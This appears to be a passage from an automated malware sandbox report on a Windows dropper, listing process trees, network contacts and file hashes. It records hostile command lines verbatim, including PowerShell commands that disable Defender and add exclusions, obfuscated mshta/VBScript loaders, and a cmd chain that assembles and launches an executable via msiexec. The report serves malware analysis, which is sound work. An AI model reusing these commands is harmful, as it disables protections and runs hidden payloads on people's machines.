PID 3476 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe
PID 3664 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe
PID 3664 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3624 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe
PID 2052 wrote to memory of 2384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe
PID 4132 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4132 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe
PID 2548 wrote to memory of 1752 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe
PID 3012 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe
PID 3012 wrote to memory of 5104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe
PID 2456 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3476 -ip 3476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4284 -ip 4284

C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MB0V3.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$9003E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 620

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-THB94.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$F0040,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4392 -ip 4392

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 748

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 824

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 660

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd3126cc40,0x7ffd3126cc4c,0x7ffd3126cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1756 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2068,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4560,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4576 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1116

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4500,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4672 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1304

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5040,i,15431767979127174377,7575012793942079680,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5216 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gcl-gb.biz udp
NL 194.104.136.5:46013 tcp
N/A 127.0.0.1:56148 tcp
N/A 127.0.0.1:56150 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 72.247.176.59:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 69.5.217.23.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 59.176.247.72.in-addr.arpa udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c12fe256228c8c0403ef35279aca6f58
SHA1 840a4eaf832f3cd154f0766dbc415a32c181e200
SHA256 86271c0587581b77766414a1238238011c10a5a06255b4611ac3b058f4529c2b
SHA512 88689761f0eeedc4ff633744dab15b26ad7352bda1f0329ed920dce463118ea11a14249cfd636aa3d39dbdabbcb1342138b7b5255a3791faf8ad955c63f5ff11

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\setup_install.exe

MD5 47a5d34f871487a79975e5586e63ebdd
SHA1 75f4f1708c2b0a6433f8c0fa6ff47799115b2d2f
SHA256 884c76e10ef7f202b677c0ccfb6e9e009ca79e7189e76509a6449b5f8c2a952f
SHA512 3f96662af4937647a78a0a51cb4916f56ee250ab14094ed608344d727489eb0135b4016a73853ca1f96b165fbe9ac7957adb1cc884fff55cea837f668b157d04

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3476-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3476-69-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3476-68-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3476-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3476-65-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3476-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3476-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3476-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3476-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3476-78-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3476-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3476-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3476-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3476-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8FC50487\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
